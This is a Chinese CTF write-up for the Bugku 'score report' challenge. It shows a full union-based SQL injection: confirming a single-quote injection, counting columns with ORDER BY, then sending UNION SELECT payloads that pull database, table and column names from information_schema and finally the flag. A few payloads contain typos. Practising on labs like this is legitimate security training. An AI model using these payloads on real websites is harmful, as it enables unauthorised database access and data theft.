CTF-成绩单 90
Posted cxl862002755
tags:
篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了CTF-成绩单 90相关的知识,希望对你有一定的参考价值。
CTF-成绩单
点击进去看到这个就联想到了SQL注入
用火狐的HackBar进行sql注入尝试
先输入id=1显示除了一个龙龙龙的成绩单
再试试id=2
判断下注入类型
and 1=1/1=2没反应 试了下单引号注入 id=2‘发现成绩单消失了确定为单引号注入
用order by 判断多少列order by 1 #(#注释)order by 5#不能回显,order by 4#可以
所以确定列数4
使用union查询
现将id=2‘注释掉,id=-2‘即可注释掉
输入id=-2‘ union select union 1,2,3,4#
再输入d=-2‘ union select union 1,2,3,database()#查看数据库
得到数据库skctf_flag
在获取数据表输入
id=-2‘ union select 1,2,3,group_concat(table_name) from information_schema.tables where table_schema=‘skctf_flag‘#
获得两个数据表
Flag应该藏在fl4g数据表里面,获取其中的列信息,输入
id=-2‘ union select 1,2,3,group_concat(column_name) from information_schema.columns where table_name=‘fl4g‘#
得到一个列
最后输入
id=-2‘ union select 1,2,3,group_concat(skctf_flag) from fl4g#
成功获得flag BUGKU{Sql_INJECT0N_4813drd8hz4}
以上是关于CTF-成绩单 90的主要内容,如果未能解决你的问题,请参考以下文章
Java基础练习题5--[给定一段字符串,将里面的信息进行提取,(注意:需要考虑信息是可变的)String s=“张三:上机成绩=90,笔试成绩=78“+“李四:上机成绩=68,笔试成绩......]